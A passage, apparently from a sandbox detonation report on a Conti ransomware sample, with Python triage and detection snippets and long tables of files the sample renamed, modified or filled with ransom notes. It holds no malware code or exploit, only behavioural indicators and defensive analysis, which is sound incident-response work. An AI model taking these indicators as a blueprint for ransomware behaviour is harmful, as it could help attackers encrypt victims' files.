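    {"path": r"C:\Users\Admin\AppData\Roaming\779389082",
     "md5": "40b7f298d30296864906d4e175ff9f43",
     "sha256": "2448a49c12e2c959a2f88d179c346a4d753725578a4755c8f8f487b1048fdcd4"},
    {"path": r"C:\Users\Admin\AppData\Roaming\779389082",
     "md5": "ba41580a52e592f902ce53d5bf4eaddc",
     "sha256": "50577e8ae3331aa6d25cfb4a270291ee3503d88febca708d9de04b796ee694df"},
    {"path": r"\??\PIPE\wkssvc",
     "md5": "d41d8cd98f00b204e9800998ecf8427e",
     "sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
     "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},
    {"path": r"C:\Users\Admin\AppData\Roaming\779389082",
     "md5": "df63728d68a4ac8b176671b22e5b3b76",
     "sha256": "bd1aa34af510bdbe455df7e883e3ab3d2a220a703fffe872e13d2167519f311e"},
]


def is_memory_dump(path: str) -> bool:
    return path.startswith("memory/") and path.endswith("-memory.dmp")


def is_empty_content(entry: dict) -> bool:
    """True when every digest present equals the digest of zero-length input."""
    present = [(alg, entry[alg]) for alg in EMPTY_DIGESTS if alg in entry]
    return bool(present) and all(EMPTY_DIGESTS[alg] == value.lower() for alg, value in present)


def triage_files(entries):
    """Skip memory dumps, set aside empty captures, group the rest by path
    so a path rewritten several times shows up once with all its digests."""
    result = {"skipped_memory": 0, "empty": [], "artefacts": defaultdict(list)}
    for e in entries:
        if is_memory_dump(e["path"]):
            result["skipped_memory"] += 1
        elif is_empty_content(e):
            result["empty"].append(e["path"])
        else:
            result["artefacts"][e["path"]].append(e["sha256"])
    result["artefacts"] = dict(result["artefacts"])
    return result


def rewritten_paths(entries, min_versions=2):
    """Paths whose content changed during the run (>= min_versions distinct SHA-256)."""
    arts = triage_files(entries)["artefacts"]
    return sorted(p for p, hashes in arts.items() if len(set(hashes)) >= min_versions)


if __name__ == "__main__":
    t = triage_files(FILE_ENTRIES)
    print("memory dumps skipped:", t["skipped_memory"])
    print("empty captures:", t["empty"])
    print("rewritten paths:", rewritten_paths(FILE_ENTRIES))
```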

Analysis: behavioral14

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1709s

Max time network

1164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Renames multiple (7310) files with added filename extension

ransomware

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
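
The "Drops startup file" hit is worth qualifying: R3ADM3.txt in Word's STARTUP folder is the same ransom note the sample writes into every directory it touches (the Program Files table further down shows it under Adobe Reader paths as well), and Word only loads templates and add-ins (.dot, .dotm, .dotx, .wll) from that folder, so a .txt there is collateral from the note spray rather than a persistence mechanism. The snippet below is an added example, not part of the report or of the sandbox's signature logic: it tells the two cases apart by checking whether the dropped type is loadable from that startup location and whether the same filename was created across other directories. The startup-location table is a representative assumption of this example, not an exhaustive list, and the event rows are constructed from this table and the Program Files table below.

```python
"""Persistence or note spray?  Qualify 'startup file' hits from a sandbox
file-event list.  Added example; not part of the report."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Startup locations and the file types their host actually loads from them.
# Representative, not exhaustive (assumption of this example).
STARTUP_LOCATIONS = [
    (re.compile(r"\\Microsoft\\Word\\STARTUP\\", re.I), {".dot", ".dotm", ".dotx", ".wll"}),
    (re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I),
     {".lnk", ".exe", ".bat", ".cmd", ".vbs", ".js", ".url"}),
]

# Constructed rows in the report's (Description, Indicator, Process) shape,
# taken from this table and from the Program Files table further down.
CONTI = r"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"
EVENTS = [
    ("File created", r"C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt", CONTI),
    ("File created", r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\R3ADM3.txt", CONTI),
    ("File created", r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\R3ADM3.txt", CONTI),
    ("File opened for modification", r"C:\Users\Admin\Documents\desktop.ini", CONTI),
]


def startup_location(path: str):
    """The loadable-extension set for the startup location containing path, else None."""
    for rx, exts in STARTUP_LOCATIONS:
        if rx.search(path):
            return exts
    return None


def assess_startup_drops(events, spray_threshold=2):
    """For each 'File created' inside a startup location decide between
    'persistence candidate' (host-loadable type) and 'ransom-note spray'
    (non-loadable type whose name was also created in >= spray_threshold dirs)."""
    created_dirs = defaultdict(set)
    for desc, path, _ in events:
        if desc == "File created":
            p = PureWindowsPath(path)
            created_dirs[p.name.lower()].add(str(p.parent).lower())
    verdicts = {}
    for desc, path, _ in events:
        exts = startup_location(path)
        if desc != "File created" or exts is None:
            continue
        p = PureWindowsPath(path)
        if p.suffix.lower() in exts:
            verdicts[path] = "persistence candidate"
        elif len(created_dirs[p.name.lower()]) >= spray_threshold:
            verdicts[path] = "ransom-note spray"
        else:
            verdicts[path] = "unloadable drop, review manually"
    return verdicts


if __name__ == "__main__":
    for path, verdict in assess_startup_drops(EVENTS).items():
        print(f"{verdict:28s} {path}")
```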

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-il\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\VisualElements\SmallLogoCanary.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_fr_135x40.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-tw\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OMML2MML.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-140.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\jpeg_fx.md C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\meta\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\Locales\de.pak C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_selected_18.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019R_Trial-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nl-nl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\ISO690Nmerical.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\fi-FI\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hi.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\root\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ug.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
